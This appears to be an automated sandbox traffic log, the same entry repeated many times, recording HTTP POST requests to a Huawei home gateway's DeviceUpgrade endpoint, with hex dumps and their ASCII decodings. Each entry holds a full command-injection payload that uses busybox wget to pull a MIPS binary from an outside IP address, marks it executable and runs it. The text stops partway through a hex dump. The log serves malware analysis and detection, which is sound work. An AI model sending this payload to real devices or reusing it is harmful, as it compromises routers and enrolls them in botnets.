63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 